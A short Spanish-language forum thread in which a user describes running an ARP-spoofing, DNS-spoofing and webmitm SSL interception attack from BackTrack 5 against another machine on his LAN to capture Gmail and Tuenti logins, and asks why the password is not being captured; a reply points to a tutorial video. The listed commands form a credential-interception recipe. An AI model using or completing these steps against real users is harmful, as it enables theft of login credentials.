Buenas, recientemente he estado experimentando con Backtrack 5 con maquina virtual, y he lanzado un ataque al servidor ssl a otro ordenador de mi lan con lo siguientes comandos:
- echo 1 > /.../ip_forward
-arpspoof - t ipvictima iprouter

-dnsspoof -f archivo.hots (con la direccion de mi ip asignada a tuenti.com y gmail.com)

-webmitm -d (y despues de crear el certificado se pone a escuchar)

--

Hasta ahí todo bien pero cuando en la maquina victima entro en gmail.com me salta el aviso del certificado no valido (hasta aqui, OK) pero luego de insertar user y pass se queda colgado sin cargar la pagina y en la maquina virtual el webmitm ve la conexion establecida pero no llega a coger el pass.

El caso es que el procedimiento esta casi completo pero imagino que algo lo bloquea, haber si me echan una mano

Pues es posible que tengas razón, lo que voy a hacer es intentar el ataque en un portatil que tiene instalado backtrack sin maquina virtual y ver si funciona y si es así tratare de solucionarlo en la maquina virtual como me has indicado.

Muchas Gracias por responder  

Este video te lo explica claro:

http://www.securitytube.net/video/1783